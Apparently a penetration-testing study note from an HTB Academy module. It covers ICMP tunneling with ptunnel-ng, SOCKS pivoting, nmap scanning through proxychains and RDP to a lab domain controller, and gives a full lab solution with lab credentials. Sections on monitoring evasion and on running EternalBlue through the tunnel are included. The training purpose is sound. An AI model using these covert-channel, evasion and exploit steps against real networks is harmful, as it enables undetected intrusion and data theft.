📡ICMP Tunneling with ptunnel-ng

📋 Module Overview

Purpose: Traffic encapsulation within ICMP echo requests/responses Tool: ptunnel-ng - ICMP tunnel implementation Protocol: ICMP (Internet Control Message Protocol) Advantage: Bypasses firewalls that allow ping, stealth communication Use Case: Data exfiltration, covert channels, firewall bypass

1. Introduction to ICMP Tunneling

What is ICMP Tunneling?

Protocol: Uses ICMP echo requests and responses for data transmission
Encapsulation: Traffic hidden within ping packets
Stealth: Appears as legitimate network diagnostics
Firewall Bypass: Works when ping is allowed outbound
Bidirectional: Full communication channel support

How ICMP Tunneling Works

[Internal Host] → [Firewall] → [External Server]
ICMP Echo Req     Allows Ping    ptunnel-ng Server
Data in Payload   No Deep Insp   Extracts Data
SSH/TCP Traffic   Passes Through  Forwards to Target

ICMP Tunneling Use Cases

Restrictive Firewalls - only ICMP allowed outbound
Data Exfiltration - covert data transmission
Command & Control - stealth C2 channels
Network Pivoting - access internal networks
Security Testing - demonstrate firewall weaknesses

ICMP vs Other Tunneling Protocols

Aspect

ICMP

DNS

HTTP

SSH

Stealth

Very High

High

Medium

Low

Firewall Bypass

Excellent

Good

Limited

Performance

Low

Medium

High

Setup Complexity

Medium

Low

Detection Difficulty

Hard

Medium

Easy

Payload Size

Small

Large

2. ptunnel-ng Overview

What is ptunnel-ng?

Evolution: Next generation of original ptunnel
Language: C implementation
Platform: Linux/Unix systems
Features: ICMP tunneling with TCP forwarding
Modes: Client-server architecture
Security: Basic authentication support

ptunnel-ng Architecture

[Attack Host] ←ICMP→ [Pivot Host] ←TCP→ [Target Services]
ptunnel Client      ptunnel Server      SSH, RDP, etc.
Local Port 2222     ICMP Listener       Internal Network
TCP to ICMP         ICMP to TCP         172.16.5.0/23

Key Features

Protocol Translation - TCP to ICMP conversion
Port Forwarding - local port to remote service
Session Management - multiple concurrent tunnels
Statistics - traffic monitoring and analysis
Privilege Management - drops privileges after setup

3. Installation and Setup

Method 1: Git Clone and Build

Clone Repository

# Clone ptunnel-ng from GitHub
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/

# Check repository structure
ls -la
# autogen.sh, configure.ac, src/, etc.

Install Build Dependencies

# Install required build tools
sudo apt update
sudo apt install automake autoconf build-essential

# For static binary compilation
sudo apt install libc6-dev-i386

Compile Standard Binary

# Run autogen script to configure and build
sudo ./autogen.sh

# Expected output:
# ++ pwd
# + OLD_WD=/path/to/ptunnel-ng
# + autoreconf -fi
# + ./configure
# + make clean
# + make -j4 all

# Binary location
ls -la src/ptunnel-ng

Compile Static Binary (Recommended)

# Create static binary for better portability
sudo apt install automake autoconf -y
cd ptunnel-ng/

# Modify autogen.sh for static compilation
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh

# Build static binary
./autogen.sh

# Verify static linking
file src/ptunnel-ng
# Should show: statically linked

Method 2: Cross-Compilation for x86_64

For ARM64 Host (M1/M2 Kali)

# Install cross-compiler
sudo apt install gcc-x86-64-linux-gnu

# Configure for x86_64 target
export CC=x86_64-linux-gnu-gcc
./configure --host=x86_64-linux-gnu

# Build for x86_64
make clean && make

# Verify architecture
file src/ptunnel-ng
# Should show: x86-64

Architecture Compatibility Issues

# Common problem: ARM binary on x86_64 target
# Error: ./ptunnel-ng: 1: @@l@8: not found
# Error: ELF��: not found

# Solution: Always match target architecture
# ARM64 Kali → x86_64 Ubuntu = cross-compile needed
# x86_64 Kali → x86_64 Ubuntu = direct compile works

4. Server Setup (Pivot Host)

Transfer Binary to Pivot Host

Method 1: SCP Transfer

# Transfer entire repository
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

# Or transfer just the binary
scp ptunnel-ng/src/ptunnel-ng ubuntu@10.129.202.64:~/

Method 2: Compile on Target

# SSH to target and compile locally (avoids arch issues)
ssh ubuntu@10.129.202.64

# Install dependencies on target
sudo apt update
sudo apt install automake autoconf build-essential git

# Clone and build on target
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/
sudo ./autogen.sh

Start ptunnel-ng Server

Basic Server Configuration

# Start server on pivot host
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22

# Expected output:
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: (c) 2017-2019 Toni Uhlig,     <matzeton@googlemail.com>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.

Server Parameters Explanation

# Command breakdown:
sudo ./ptunnel-ng -r10.129.202.64 -R22

# -r10.129.202.64  : IP address to accept connections from
# -R22             : Forward to local port 22 (SSH)
# sudo             : Required for ICMP socket privileges

Common Server Issues

# Problem: libselinux warning
./ptunnel-ng: /lib/x86_64-linux-gnu/libselinux.so.1: no version information available

# Solution: Usually safe to ignore, or install libselinux1-dev

# Problem: Permission denied for ICMP
[err]: Could not create ICMP socket: Operation not permitted

# Solution: Run with sudo
sudo ./ptunnel-ng -r10.129.202.64 -R22

5. Client Setup (Attack Host)

Connect to ptunnel-ng Server

Basic Client Connection

# Connect from attack host to server
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# Expected output:
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: (c) 2017-2019 Toni Uhlig,     <matzeton@googlemail.com>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Relaying packets from incoming TCP streams.

Client Parameters Explanation

# Command breakdown:
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# -p10.129.202.64  : Target server IP (where ICMP server runs)
# -l2222           : Local port to listen on
# -r10.129.202.64  : Remote IP to forward to
# -R22             : Remote port to forward to

Test ICMP Tunnel

SSH Through ICMP Tunnel

# Connect via local port 2222 (tunneled through ICMP)
ssh -p2222 -lubuntu 127.0.0.1

# If successful:
ubuntu@127.0.0.1's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
ubuntu@WEB01:~$

Verify Tunnel Statistics

# Server side shows session statistics:
[inf]: Incoming tunnel request from 10.10.14.18.
[inf]: Starting new session to 10.129.202.64:22 with ID 20199
[inf]: Received session close from remote peer.
[inf]: 
Session statistics:
[inf]: I/O:   0.00/  0.00 mb ICMP I/O/R:      248/      22/       0 Loss:  0.0%

6. Advanced Usage - Dynamic Port Forwarding

SSH Dynamic Port Forwarding

Setup SOCKS Proxy Through ICMP

# Establish dynamic port forwarding over ICMP tunnel
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# This creates SOCKS proxy on port 9050
# All traffic routes through ICMP tunnel

Configure Proxychains

# Edit proxychains configuration
sudo nano /etc/proxychains4.conf

# Add SOCKS proxy entry
[ProxyList]
socks4 127.0.0.1 9050

# Verify configuration
tail -5 /etc/proxychains4.conf

Network Scanning Through ICMP Tunnel

Proxychains + Nmap

# Scan internal network through ICMP tunnel
proxychains nmap -sV -sT 172.16.5.19 -p3389

# Expected output:
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Service Enumeration

# Comprehensive port scan through tunnel
proxychains nmap -sT -Pn 172.16.5.0/24

# Service version detection
proxychains nmap -sV -sT -p 80,443,3389,5985 172.16.5.19

# Script scanning
proxychains nmap -sC -sV -p 3389 172.16.5.19

7. HTB Academy Lab Exercise

Lab Challenge

"Using the concepts taught thus far, connect to the target and establish an ICMP tunnel. Pivot to the DC (172.16.5.19, victor:pass@123) and submit the contents of C:\Users\victor\Downloads\flag.txt as the answer."

Lab Environment

Target SSH: 10.129.202.64 with credentials ubuntu:HTB_@cademy_stdnt!
Internal Network: 172.16.5.0/23
Domain Controller: 172.16.5.19
DC Credentials: victor:pass@123
Flag Location: C:\Users\victor\Downloads\flag.txt

Complete Lab Solution

Step 1: Setup ptunnel-ng on Attack Host

# Clone and build ptunnel-ng
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/

# Install dependencies
sudo apt update
sudo apt install automake autoconf build-essential

# Build binary
sudo ./autogen.sh

# Verify binary works
ls -la src/ptunnel-ng
./src/ptunnel-ng --help

Step 2: Transfer to Pivot Host

# Transfer repository to target
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

# Or compile on target to avoid architecture issues
ssh ubuntu@10.129.202.64
sudo apt update
sudo apt install automake autoconf build-essential git
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/
sudo ./autogen.sh

Step 3: Start Server on Pivot Host

# SSH to pivot host
ssh ubuntu@10.129.202.64
# Password: HTB_@cademy_stdnt!

# Start ptunnel-ng server
cd ptunnel-ng/src/
sudo ./ptunnel-ng -r10.129.202.64 -R22

# Expected output:
[inf]: Starting ptunnel-ng 1.42.
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.

Step 4: Connect Client from Attack Host

# Start ptunnel-ng client (new terminal on attack host)
cd ptunnel-ng/src/
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# Expected output:
[inf]: Starting ptunnel-ng 1.42.
[inf]: Relaying packets from incoming TCP streams.

Step 5: Test ICMP Tunnel

# Test SSH connection through ICMP tunnel
ssh -p2222 -lubuntu 127.0.0.1

# Should connect successfully:
ubuntu@127.0.0.1's password: HTB_@cademy_stdnt!
Welcome to Ubuntu 20.04.3 LTS
ubuntu@WEB01:~$

Step 6: Setup Dynamic Port Forwarding

# Establish SOCKS proxy through ICMP tunnel
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# Keep this session open for proxy

Step 7: Configure Proxychains

# Edit proxychains configuration (new terminal)
sudo nano /etc/proxychains4.conf

# Ensure SOCKS4 proxy is configured:
[ProxyList]
socks4 127.0.0.1 9050

# Verify configuration
tail -5 /etc/proxychains4.conf

Step 8: Scan Internal Network

# Scan Domain Controller through ICMP tunnel
proxychains nmap -sT -Pn 172.16.5.19 -p 3389

# Should show RDP service:
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Step 9: RDP to Domain Controller

# RDP through ICMP tunnel to DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:'pass@123'

# Accept certificate when prompted

Step 10: Retrieve Flag

# In RDP session, open Command Prompt
# Navigate to Downloads folder
cd C:\Users\victor\Downloads\

# List files
dir

# Read flag content
type flag.txt

# Submit flag content as answer

Lab Solution Summary

# Attack Host - Terminal 1: Setup
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/ && sudo ./autogen.sh
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

# Pivot Host: Start Server
ssh ubuntu@10.129.202.64
cd ptunnel-ng/src/
sudo ./ptunnel-ng -r10.129.202.64 -R22

# Attack Host - Terminal 2: Start Client
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# Attack Host - Terminal 3: Dynamic Forwarding
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# Attack Host - Terminal 4: Access DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:'pass@123'
# In RDP: type C:\Users\victor\Downloads\flag.txt

8. Network Traffic Analysis

Wireshark Analysis

Normal SSH Traffic

# Command: ssh ubuntu@10.129.202.64
# Wireshark shows:
- TCP handshake to port 22
- SSHv2 protocol packets
- Encrypted SSH payload data
- Clear TCP/SSH packet headers

ICMP Tunneled SSH Traffic

# Command: ssh -p2222 -lubuntu 127.0.0.1
# Wireshark shows:
- ICMP Echo Request packets
- ICMP Echo Reply packets
- Payload contains tunneled SSH data
- No visible TCP/SSH headers
- Appears as ping traffic to security tools

Traffic Characteristics

# ICMP tunnel characteristics:
- Type: ICMP (Protocol 1)
- Echo Request (Type 8, Code 0)
- Echo Reply (Type 0, Code 0)
- Payload: Encapsulated TCP data
- Frequency: Regular ping-like intervals
- Size: Variable payload sizes (unusual for ping)

Detection Signatures

# Potential detection indicators:
1. Large ICMP payload sizes
2. High frequency ICMP traffic
3. Regular bidirectional ICMP flows
4. ICMP traffic to non-standard destinations
5. Payload entropy analysis (encrypted data)

9. Troubleshooting

Common Issues

Architecture Mismatch

# Problem: Binary won't execute on target
./ptunnel-ng: 1: @@l@8: not found
./ptunnel-ng: 1: ELF��: not found

# Cause: ARM64 binary on x86_64 system

# Solutions:
1. Compile on target system
   ssh target && git clone && ./autogen.sh

2. Cross-compile on attack host
   export CC=x86_64-linux-gnu-gcc
   ./configure --host=x86_64-linux-gnu

3. Use static binary compilation
   sed -i '$s/.*/LDFLAGS=-static ...' autogen.sh

Permission Issues

# Problem: ICMP socket creation fails
[err]: Could not create ICMP socket: Operation not permitted

# Solution: Run with sudo
sudo ./ptunnel-ng -r10.129.202.64 -R22

# Problem: Privilege dropping fails
[err]: Could not drop privileges

# Solution: Check user/group permissions
sudo chown root:root ptunnel-ng
sudo chmod 4755 ptunnel-ng

Connection Issues

# Problem: No ICMP responses
[inf]: No response from target

# Solutions:
1. Check ICMP is allowed by firewall
   ping 10.129.202.64

2. Verify server is running
   ps aux | grep ptunnel

3. Check server IP binding
   netstat -an | grep icmp

Performance Issues

# Problem: Slow tunnel performance
# ICMP has inherent limitations

# Optimizations:
1. Reduce MTU size
   ip link set dev eth0 mtu 1200

2. Adjust tunnel parameters
   ./ptunnel-ng -m 1024 -p target

3. Use compression for SSH
   ssh -C -p2222 -lubuntu 127.0.0.1

10. Operational Security (OPSEC)

Stealth Considerations

Traffic Appearance - looks like diagnostic ping traffic
Payload Size - unusual ICMP payload sizes may trigger alerts
Frequency - high-frequency pings may be suspicious
Timing - regular intervals could indicate automation
Destination - multiple ICMP flows to same target

Detection Evasion

# Use irregular timing patterns
# Avoid sustained high-volume traffic
# Monitor for security tool alerts
# Use legitimate-looking source IPs
# Limit session duration

Network Monitoring Evasion

# Techniques to avoid detection:
1. Rate limiting - space out ICMP packets
2. Size variation - vary payload sizes
3. Jitter - add random delays
4. Multiple paths - use different routes
5. Traffic mixing - blend with legitimate pings

11. Integration with Other Techniques

Multi-hop ICMP Tunneling

# Chain multiple ICMP tunnels
[Attack] → ICMP → [Pivot1] → ICMP → [Pivot2] → [Target]

# Setup cascaded tunnels
# Pivot1: ptunnel-ng server + client
# Each hop forwards to next

ICMP + SSH Port Forwarding

# Combine ICMP tunnel with SSH forwarding
ssh -L 8080:172.16.5.19:80 -p2222 -lubuntu 127.0.0.1

# Now port 8080 tunnels through ICMP to internal web server
curl http://127.0.0.1:8080

ICMP + Metasploit

# Use ICMP tunnel for Metasploit payloads
# Setup SOCKS proxy through ICMP
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# Configure Metasploit to use proxy
setg Proxies socks4:127.0.0.1:9050

# Launch exploits through ICMP tunnel
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 172.16.5.19
exploit

12. Alternative ICMP Tunneling Tools

Tool Comparison

Tool

Language

Features

Platform

Stealth

ptunnel-ng

TCP forwarding

Linux/Unix

High

icmptunnel

Python

Raw ICMP

Cross-platform

High

ICMP-TransferTools

PowerShell

File transfer

Windows

Medium

pingfs

Filesystem over ICMP

Linux

Very High

ICMPDoor

ICMP backdoor

Linux/Windows

High

When to Use ICMP Tunneling

✅ Restrictive firewall environments ✅ Only ICMP allowed outbound ✅ Stealth communication required ✅ Data exfiltration scenarios ✅ Security testing engagements

Limitations

❌ Low bandwidth performance ❌ High latency connections ❌ Small payload size restrictions ❌ Deep packet inspection environments ❌ ICMP rate limiting policies

References

HTB Academy: Pivoting, Tunneling & Port Forwarding - Page 14
ptunnel-ng GitHub: Official Repository
Original ptunnel: Legacy Implementation
ICMP RFC: RFC 792 - Internet Control Message Protocol
Network Tunneling: SANS Tunneling Guide
Covert Channels: ICMP Covert Channel Analysis

PreviousDNS Tunneling with dnscat2 NextComplete Skills Assessment

Last updated 5 months ago